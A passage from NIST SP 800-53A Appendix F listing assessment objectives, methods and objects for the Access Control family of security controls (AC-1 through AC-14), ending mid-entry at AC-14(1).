NIST SP 800-53A Appendix F
APPENDIX F
ASSESSMENT PROCEDURE CATALOG
OBJECTIVES, METHODS, AND OBJECTS FOR ASSESSING SECURITY CONTROLS
This appendix provides a catalog of procedures to assess the security controls and control enhancements in NIST Special Publication 800-53.56 [1] The assessment procedures listed in Section I, are aligned with the security control catalog in Special Publication 800-53.
Assessors should select the appropriate assessment procedures from the catalog in this appendix for the security controls and control enhancements included in the security plan that are to be assessed in a particular assessment. Since the contents of the security plan affect the development of the security assessment plan and the assessment, there will likely be assessment procedures in the catalog that assessors will not use because: (i) the associated security controls or control enhancements are not contained in the security plan for the information system;57 [2] or (ii) the security controls or control enhancements are not being assessed at this particular time (e.g., during an assessment of a subset of the controls as part of continuous monitoring activities).
In addition to the assessment procedures provided for security controls and control enhancements, the catalog also contains an extended assessment procedure in Section II that is employed by assessors to obtain additional assurance-related evidence to support the grounds for confidence that the security controls are effective in their application. The extended assessment procedure, which follows the assessment procedures in the catalog, can be applied by the organization in a variety of ways depending on how the information system security controls are developed and implemented, and how the organization manages its security control assessment processes. Section 3.3 of this document provides guidance on the application of the extended assessment procedure.
Each assessment procedure consists of one or more assessment objectives, which are used in assessing particular aspects of a security control or control enhancement (or in the case of the extended assessment procedure, aspects of the security control, control enhancement, family of controls, or security controls employed across the organization). Each assessment objective in an assessment procedure contains a unique identifier. For example, CP-3.2 indicates that this is the second assessment objective for security control CP-3. CP-4(2).1 indicates that this is the first assessment objective for the second enhancement for security control CP-4. The extended assessment objectives are numbered sequentially (i.e., EAP.1, EAP.2, EAP.3, EAP.4, EAP.5) and are employed based upon the impact level of the information system.
Assessors should select appropriate assessment methods from the potential assessment methods listed in the assessment procedures for security controls and control enhancements. Appropriate assessment methods are those methods that will most likely produce the evidence needed by assessors to make the determinations necessary to satisfy the specified assessment objectives.58 [3] It is also important to determine when those methods should be applied with regard to the impact level of the information system being assessed. To assist assessors in making this determination, the assessment procedures in the catalog in Appendix F include a suggested application of the potential assessment methods to a low-impact, moderate-impact, and high-impact information system assessment provided by the designators (L), (M), and (H) respectively. These designations are intended to assist, not limit, assessors in the selection of the most cost-effective assessment methods for the assessment. The designators are provided for each of the impact levels at which security controls/control enhancements are likely to be employed based on anticipated common usage.59 [4]
It should also be noted that the same assessment object may appear in multiple object lists in a variety of assessment procedures. The same object may be used in multiple contexts to obtain needed information or evidence for a particular aspect of an assessment. Assessors should use the general reference as appropriate to obtain the necessary information to make the specified determinations required by the assessment objective. For example, a reference to access control policy appears in the assessment procedures for AC-2 and AC-7. For assessment procedure AC- 2, assessors use the access control policy to find information about that portion of the policy that addresses account management for the information system. For assessment procedure AC-7, assessors use the access control policy to find information about that portion of the policy that addresses unsuccessful login attempts for the information system.
Implementation Tips |
| TIP #1: Select only those assessment procedures from Appendix F that correspond to the security controls and control enhancements in the approved security plan and that are to be included in the assessment. |
| TIP #2: The assessment procedures selected from Appendix F are simply exemplary procedures. These procedures should be reviewed and appropriately tailored and supplemented as necessary, in accordance with the guidance in Section 3.3 to adapt the procedures to specific organizational requirements and operating environments. |
| TIP #3: The assessor applies to each method, the values for depth and coverage that are commensurate with the impact level of the information system and the specifics of the determination to be made. The values selected for the depth and coverage attributes indicate how much effort is applied to the assessment (i.e., the rigor, level of intensity, and scope of the activities associated with the assessment). |
| TIP #4: With respect to the assessment procedures in Appendix F, assessors need apply only those procedures, methods, and objects necessary for making a final determination that a particular security control objective is satisfied or not satisfied (see Section 3.4). |
| Note #1: NIST Special Publication 800-53A is a companion publication to NIST Special Publication 800-53, not a replacement or update. Special Publication 800-53 remains the definitive NIST recommendation for employing security controls in federal information systems. |
| Note #2: When assessing agency compliance with NIST guidance, auditors, inspector generals, evaluators, and/or assessors should consider the intent of the security concepts and principles articulated within the particular guidance document and how the agency applied the guidance in the context of its specific mission responsibilities, operational environments, and unique organizational conditions. |
Reminder |
| Whereas a set of potential assessment methods have been included in the following catalog of assessment procedures, these are not intended to be mandatory or exclusive and, depending on the particular circumstances of the information system to be assessed, not all methods may be required or other assessment methods may also be used. Additionally, the potential assessment objects listed are not intended to be a mandatory set, but rather a set from which the necessary and sufficient set of objects for a given assessment can be selected to make the appropriate determinations. |
Section I: Assessment Procedures
FAMILY:
Access Control
| ASSESSMENT PROCEDURE | |
| AC-1 | ACCESS CONTROL POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, access control policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the access control policy and associated access controls. | |
| Supplemental Guidance: The access control policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The access control policy can be included as part of the general information security policy for the organization. Access control procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| AC-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents access control policy and procedures; | |
| (ii) the organization disseminates access control policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review access control policy and procedures; and | |
| (iv) the organization updates access control policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with access control responsibilities]. (H) | |
| AC-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the access control policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the access control policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the access control procedures address all areas identified in the access control policy and address achieving policy-compliant implementations of all associated access controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with access control responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-2 | ACCOUNT MANAGEMENT |
| Control: The organization manages information system accounts, including establishing, activating, modifying, reviewing, disabling, and removing accounts. The organization reviews information system accounts [Assignment: organization-defined frequency, at least annually]. | |
| Supplemental Guidance: Account management includes the identification of account types (i.e., individual, group, and system), establishment of conditions for group membership, and assignment of associated authorizations. The organization identifies authorized users of the information system and specifies access rights/privileges. The organization grants access to the information system based on: (i) a valid need-to-know/need-to-share that is determined by assigned official duties and satisfying all personnel security criteria; and (ii) intended system usage. The organization requires proper identification for requests to establish information system accounts and approves all such requests. The organization specifically authorizes and monitors the use of guest/anonymous accounts and removes, disables, or otherwise secures unnecessary accounts. Account managers are notified when information system users are terminated or transferred and associated accounts are removed, disabled, or otherwise secured. Account managers are also notified when users' information system usage or need-to-know/need-to-share changes. | |
| AC-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization manages information system accounts, including authorizing, establishing, activating, modifying, reviewing, disabling, and removing accounts; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the frequency of information system account reviews and the frequency is at least annually; | |
| (iii) the organization reviews information system accounts in accordance with organization-defined frequency; and | |
| (iv) the organization initiates required actions on information system accounts based on the review. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing account management; security plan; list of active system accounts along with the name of the individual associated with each account; lists of recently transferred, separated, or terminated employees; list of recently disabled information system accounts along with the name of the individual associated with each account; system-generated records with user IDs and last login date; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with account management responsibilities]. (M) (H) | |
| AC-2(1) | ACCOUNT MANAGEMENT |
| Control Enhancement: | |
| The organization employs automated mechanisms to support the management of information system accounts. | |
| AC-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to support information system account management functions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Procedures addressing account management; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H) | |
| AC-2(2) | ACCOUNT MANAGEMENT |
| Control Enhancement: | |
| The information system automatically terminates temporary and emergency accounts after [Assignment: organization-defined time period for each type of account]. | |
| AC-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, a time period for each type of account after which the information system terminates temporary and emergency accounts; and | |
| (ii) the information system automatically terminates temporary and emergency accounts after organization-defined time period for each type of account. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security plan; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H) | |
| AC-2(3) | ACCOUNT MANAGEMENT |
| Control Enhancement: | |
| The information system automatically disables inactive accounts after [Assignment: organization-defined time period]. | |
| AC-2(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, a time period after which the information system disables inactive accounts; and | |
| (ii) the information system automatically disables inactive accounts after organization- defined time period. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Procedures addressing account management; security plan; information system design documentation; information system configuration settings and associated documentation; information system-generated list of last login dates; information system- generated list of active accounts; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H) | |
| AC-2(4) | ACCOUNT MANAGEMENT |
| Control Enhancement: | |
| The organization employs automated mechanisms to audit account creation, modification, disabling, and termination actions and to notify, as required, appropriate individuals. | |
| AC-2(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization employs automated mechanisms to audit account creation, modification, disabling, and termination actions; and | |
| (ii) the organization employs automated mechanisms to notify, as required, appropriate individuals. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Procedures addressing account management; information system design documentation; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing account management functions]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-3 | ACCESS ENFORCEMENT |
| Control: The information system enforces assigned authorizations for controlling access to the system in accordance with applicable policy. | |
| Supplemental Guidance: Access control policies (e.g., identity-based policies, role-based policies, rule-based policies) and associated access enforcement mechanisms (e.g., access control lists, access control matrices, cryptography) are employed by organizations to control access between users (or processes acting on behalf of users) and objects (e.g., devices, files, records, processes, programs, domains) in the information system. In addition to controlling access at the information system level, access enforcement mechanisms are employed at the application level, when necessary, to provide increased information security for the organization. Consideration is given to the implementation of a controlled, audited, and manual override of automated mechanisms in the event of emergencies or other serious events. If encryption of stored information is employed as an access enforcement mechanism, the cryptography used is FIPS 140-2 (as amended) compliant. Related security control: SC-13. | |
| AC-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the information system enforces assigned authorizations for controlling access to the system in accordance with applicable policy; and | |
| (ii) user privileges on the information system are consistent with the documented user authorizations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing access enforcement; information system configuration settings and associated documentation; list of assigned authorizations (user privileges); information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access enforcement policy]. (M) (H) | |
| AC-3(1) | ACCESS ENFORCEMENT |
| Control Enhancement: | |
| The information system restricts access to privileged functions (deployed in hardware, software, and firmware) and security-relevant information to explicitly authorized personnel. | |
| Enhancement Supplemental Guidance: Explicitly authorized personnel include, for example, security administrators, system and network administrators, and other privileged users. Privileged users are individuals who have access to system control, monitoring, or administration functions (e.g., system administrators, information system security officers, maintainers, system programmers). | |
| AC-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization explicitly defines privileged functions and security-relevant information for the information system; | |
| (ii) the organization explicitly authorizes personnel access to privileged functions and security-relevant information in accordance with organizational policy; and | |
| (iii) the information system restricts access to privileged functions (deployed in hardware, software, and firmware) and security-relevant information to explicitly authorized personnel (e.g., security administrators). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing access enforcement; list of privileged functions and security relevant information; information system configuration settings and associated documentation; list of assigned authorizations (user privileges); information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access enforcement policy]. (H) | |
| AC-3(ICS-1) | ACCESS ENFORCEMENT |
| ICS Control Enhancements: | |
| The ICS requires dual authorization, based on approved organizational procedures, to privileged functions that have impacts on facility, public, and environmental safety. | |
| ICS Enhancement Supplemental Guidance: The organization does not employ dual-approval mechanisms when an immediate response is necessary to ensure public and environmental safety. | |
| AC-3(ICS-1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization explicitly defines privileged functions for the ICS that have impacts on facility, public, and environmental safety; and | |
| (ii) the ICS requires dual authorization, based on approved organizational procedures, to organization-identified privileged functions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing access enforcement and dual authorization; list of privileged functions for ICS; ICS configuration settings and associated documentation; list of assigned authorizations (user privileges); ICS audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing access enforcement policy]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-4 | INFORMATION FLOW ENFORCEMENT |
| Control: The information system enforces assigned authorizations for controlling the flow of information within the system and between interconnected systems in accordance with applicable policy. | |
| Supplemental Guidance: Information flow control regulates where information is allowed to travel within an information system and between information systems (as opposed to who is allowed to access the information) and without explicit regard to subsequent accesses to that information. A few, of many, generalized examples of possible restrictions that are better expressed as flow control than access control are: keeping export controlled information from being transmitted in the clear to the Internet, blocking outside traffic that claims to be from within the organization, and not passing any web requests to the Internet that are not from the internal web proxy. Information flow control policies and enforcement mechanisms are commonly employed by organizations to control the flow of information between designated sources and destinations (e.g., networks, individuals, devices) within information systems and between interconnected systems. Flow control is based on the characteristics of the information and/or the information path. Specific examples of flow control enforcement can be found in boundary protection devices (e.g., proxies, gateways, guards, encrypted tunnels, firewalls, and routers) that employ rule sets or establish configuration settings that restrict information system services or provide a packet filtering capability. Related security control: SC-7. | |
| AC-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system enforces assigned authorizations for controlling the flow of information within the system and between interconnected systems in accordance with applicable policy. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documentation; information system configuration settings and associated documentation; information system baseline configuration; list of information flow authorizations; information system audit records; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy]. (H) | |
| AC-4.2 | ASSESSMENT OBJECTIVE: |
| Determine if interconnection agreements address the types of permissible and impermissible flow of information between information systems and the required level of authorization to allow information flow as defined in the information flow enforcement policy and procedures. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system interconnection agreements; list of information flow control authorizations; other relevant documents or records]. (M) (H) | |
| AC-4(1) | INFORMATION FLOW ENFORCEMENT |
| Control Enhancement: | |
| The information system implements information flow control enforcement using explicit labels on information, source, and destination objects as a basis for flow control decisions. | |
| Enhancement Supplemental Guidance: Information flow control enforcement using explicit labels is used, for example, to control the release of certain types of information. | |
| AC-4(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system implements information flow control enforcement using explicit labels on information, source, and destination objects as a basis for flow control decisions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documents; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy]. | |
| AC-4(2) | INFORMATION FLOW ENFORCEMENT |
| Control Enhancement: | |
| The information system implements information flow control enforcement using protected processing domains (e.g., domain type-enforcement) as a basis for flow control decisions. | |
| AC-4(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system implements information flow control enforcement using protected processing domains (e.g., domain type-enforcement) as a basis for flow control decisions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documents; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy]. | |
| AC-4(3) | INFORMATION FLOW ENFORCEMENT |
| Control Enhancement: | |
| The information system implements information flow control enforcement using dynamic security policy mechanisms as a basis for flow control decisions. | |
| AC-4(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system implements information flow control enforcement using dynamic security policy mechanisms as a basis for flow control decisions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing information flow enforcement; information system design documents; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing information flow enforcement policy]. |
| ASSESSMENT PROCEDURE | |
| AC-5 | SEPARATION OF DUTIES |
| Control: The information system enforces separation of duties through assigned access authorizations. | |
| Supplemental Guidance: The organization establishes appropriate divisions of responsibility and separates duties as needed to eliminate conflicts of interest in the responsibilities and duties of individuals. There is access control software on the information system that prevents users from having all of the necessary authority or information access to perform fraudulent activity without collusion. Examples of separation of duties include: (i) mission functions and distinct information system support functions are divided among different individuals/roles; (ii) different individuals perform information system support functions (e.g., system management, systems programming, quality assurance/testing, configuration management, and network security); and (iii) security personnel who administer access control functions do not administer audit functions. | |
| AC-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes appropriate divisions of responsibility and separates duties as needed to eliminate conflicts of interest in the responsibilities and duties of individuals; and | |
| (ii) the information system enforces separation of duties through assigned access authorizations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing divisions of responsibility and separation of duties; information system configuration settings and associated documentation; list of divisions of responsibility and separation of duties; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for defining appropriate divisions of responsibility and separation of duties]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing separation of duties policy]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-6 | LEAST PRIVILEGE |
| Control: The information system enforces the most restrictive set of rights/privileges or accesses needed by users (or processes acting on behalf of users) for the performance of specified tasks. | |
| Supplemental Guidance: The organization employs the concept of least privilege for specific duties and information systems (including specific ports, protocols, and services) in accordance with risk assessments as necessary to adequately mitigate risk to organizational operations, organizational assets, and individuals. | |
| AC-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization assigns the most restrictive set of rights/privileges or accesses needed by users for the performance of specified tasks; and | |
| (ii) the information system enforces the most restrictive set of rights/privileges or accesses needed by users. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing least privilege; list of assigned access authorizations (user privileges); information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for defining least privileges necessary to accomplish specified tasks]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-7 | UNSUCCESSFUL LOGIN ATTEMPTS |
| Control: The information system enforces a limit of [Assignment: organization-defined number] consecutive invalid access attempts by a user during a [Assignment: organization-defined time period] time period. The information system automatically [Selection: locks the account/node for an [Assignment: organization-defined time period], delays next login prompt according to [Assignment: organization-defined delay algorithm.]] when the maximum number of unsuccessful attempts is exceeded. | |
| Supplemental Guidance: Due to the potential for denial of service, automatic lockouts initiated by the information system are usually temporary and automatically release after a predetermined time period established by the organization. | |
| AC-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the maximum number of consecutive invalid access attempts to the information system by a user and the time period in which the consecutive invalid access attempts occur; | |
| (ii) the information system enforces the organization-defined limit of consecutive invalid access attempts by a user during the organization-defined time period; | |
| (iii) the organization defines in the security plan, explicitly or by reference, the time period for lock out mode or delay period; | |
| (iv) the organization selects either a lock out mode for the organization-defined time period or delays next login prompt for the organization-defined delay period for information system responses to consecutive invalid access attempts; | |
| (v) the information system enforces the organization-selected lock out mode or delayed login prompt. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing unsuccessful logon attempts; security plan; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for unsuccessful login attempts]. (M) (H) | |
| AC-7(1) | UNSUCCESSFUL LOGIN ATTEMPTS |
| Control Enhancement: | |
| The information system automatically locks the account/node until released by an administrator when the maximum number of unsuccessful attempts is exceeded. | |
| AC-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system automatically locks the account/node until released by an administrator when the maximum number of unsuccessful login attempts is exceeded. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing unsuccessful logon attempts; information system design documentation; information system configuration settings and associated documentation; list of information system accounts; information system audit records; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for unsuccessful login attempts]. |
| ASSESSMENT PROCEDURE | |
| AC-8 | SYSTEM USE NOTIFICATION |
| Control: The information system displays an approved, system use notification message before granting system access informing potential users: (i) that the user is accessing a U.S. Government information system; (ii) that system usage may be monitored, recorded, and subject to audit; (iii) that unauthorized use of the system is prohibited and subject to criminal and civil penalties; and (iv) that use of the system indicates consent to monitoring and recording. The system use notification message provides appropriate privacy and security notices (based on associated privacy and security policies or summaries) and remains on the screen until the user takes explicit actions to log on to the information system. | |
| Supplemental Guidance: Privacy and security policies are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. System use notification messages can be implemented in the form of warning banners displayed when individuals log in to the information system. For publicly accessible systems: (i) the system use information is available and when appropriate, is displayed before granting access; (ii) any references to monitoring, recording, or auditing are in keeping with privacy accommodations for such systems that generally prohibit those activities; and (iii) the notice given to public users of the information system includes a description of the authorized uses of the system. | |
| AC-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
(i) the information system displays a system use notification message before granting system access informing potential users:
| |
| (ii) the system use notification message provides appropriate privacy and security notices (based on associated privacy and security policies or summaries); | |
| (iii) the organization approves the information system use notification message before its use; and | |
| (iv) the system use notification message remains on the screen until the user takes explicit actions to log on to the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; privacy and security policies; procedures addressing system use notification; information system notification messages; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for system use notification]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-9 | PREVIOUS LOGON NOTIFICATION |
| Control: The information system notifies the user, upon successful logon, of the date and time of the last logon, and the number of unsuccessful logon attempts since the last successful logon. | |
| Supplemental Guidance: None. | |
| AC-9.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system, upon successful logon, displays the date and time of the last logon and the number of unsuccessful logon attempts since the last successful logon. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing previous logon notification; information system configuration settings and associated documentation; information system notification messages; information system design documentation; other relevant documents or records]. | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for previous logon notification]. |
| ASSESSMENT PROCEDURE | |
| AC-10 | CONCURRENT SESSION CONTROL |
| Control: The information system limits the number of concurrent sessions for any user to [Assignment: organization-defined number of sessions]. | |
| Supplemental Guidance: None. | |
| AC-10.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the maximum number of concurrent sessions for information system users; and | |
| (ii) the information system limits the number of concurrent sessions for users to the organization-defined number of sessions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing concurrent session control; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for concurrent session control]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-11 | SESSION LOCK |
| Control: The information system prevents further access to the system by initiating a session lock after [Assignment: organization-defined time period] of inactivity, and the session lock remains in effect until the user reestablishes access using appropriate identification and authentication procedures. | |
| Supplemental Guidance: Users can directly initiate session lock mechanisms. A session lock is not a substitute for logging out of the information system. Organization-defined time periods of inactivity comply with federal policy; for example, in accordance with OMB Memorandum 06-16, the organization-defined time period is no greater than thirty minutes for remote access and portable devices. | |
| AC-11.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the time period of user inactivity after which the information system initiates a session lock; | |
| (ii) the information system initiates a session lock after the organization-defined time period of inactivity; | |
| (iii) the information system provides the capability for users to directly initiate session lock mechanisms; and | |
| (iv) the information system maintains the session lock until the user reestablishes access using appropriate identification and authentication procedures. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing session lock; information system design documentation; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for session lock]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-12 | SESSION TERMINATION |
| Control: The information system automatically terminates a remote session after [Assignment: organization-defined time period] of inactivity. | |
| Supplemental Guidance: A remote session is initiated whenever an organizational information system is accessed by a user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet). | |
| AC-12.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the time period of user inactivity that initiates a remote session termination within the information system; and | |
| (ii) the information system automatically terminates a remote session after the organization-defined time period of inactivity. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing session termination; information system design documentation; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for session termination]. (H) | |
| AC-12(1) | SESSION TERMINATION |
| Control Enhancement: | |
| Automatic session termination applies to local and remote sessions. | |
| AC-12(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if automatic session termination applies to local and remote sessions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing session termination; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing the access control policy for session termination]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-13 | SUPERVISION AND REVIEW — ACCESS CONTROL |
| Control: The organization supervises and reviews the activities of users with respect to the enforcement and usage of information system access controls. | |
| Supplemental Guidance: The organization reviews audit records (e.g., user activity logs) for inappropriate activities in accordance with organizational procedures. The organization investigates any unusual information system-related activities and periodically reviews changes to access authorizations. The organization reviews more frequently the activities of users with significant information system roles and responsibilities. The extent of the audit record reviews is based on the FIPS 199 impact level of the information system. For example, for low-impact systems, it is not intended that security logs be reviewed frequently for every workstation, but rather at central points such as a web proxy or email servers and when specific circumstances warrant review of other audit records. NIST Special Publication 800-92 provides guidance on computer security log management. | |
| AC-13.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization supervises and reviews the activities of users with respect to the enforcement and usage of information system access controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing supervision and review of access control enforcement and usage; organizational records of supervisory notices of disciplinary actions to users; information system exception reports; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with supervisory and access control responsibilities]. (M) (H) | |
| AC-13(1) | SUPERVISION AND REVIEW — ACCESS CONTROL |
| Control Enhancement: | |
| The organization employs automated mechanisms to facilitate the review of user activities. | |
| AC-13(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms within the information system to support and facilitate the review of user activities. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing supervision and review of access control enforcement and usage; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms supporting the access control policy for supervision and review of user activities]. (H) |
| ASSESSMENT PROCEDURE | |
| AC-14 | PERMITTED ACTIONS WITHOUT IDENTIFICATION OR AUTHENTICATION |
| Control: The organization identifies and documents specific user actions that can be performed on the information system without identification or authentication. | |
| Supplemental Guidance: The organization allows limited user activity without identification and authentication for public websites or other publicly available information systems (e.g., individuals accessing a federal information system at http://www.firstgov.gov). Related security control: IA-2. | |
| AC-14.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization identifies and documents specific user actions that can be performed on the information system without identification or authentication. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Access control policy; procedures addressing permitted actions without identification and authentication; information system configuration settings and associated documentation; security plan; other relevant documents or records]. (L) (M) (H) | |
| AC-14(1) | PERMITTED ACTIONS WITHOUT IDENTIFICATION OR AUTHENTICATION |
| Control Enhancement: | |
| The organization permits actions to be performed without identification and authentication only to the extent necessary to accomplish mission objectives. | |
| AC-14(1).1 | ASSESSMENT OBJECTIVE: |
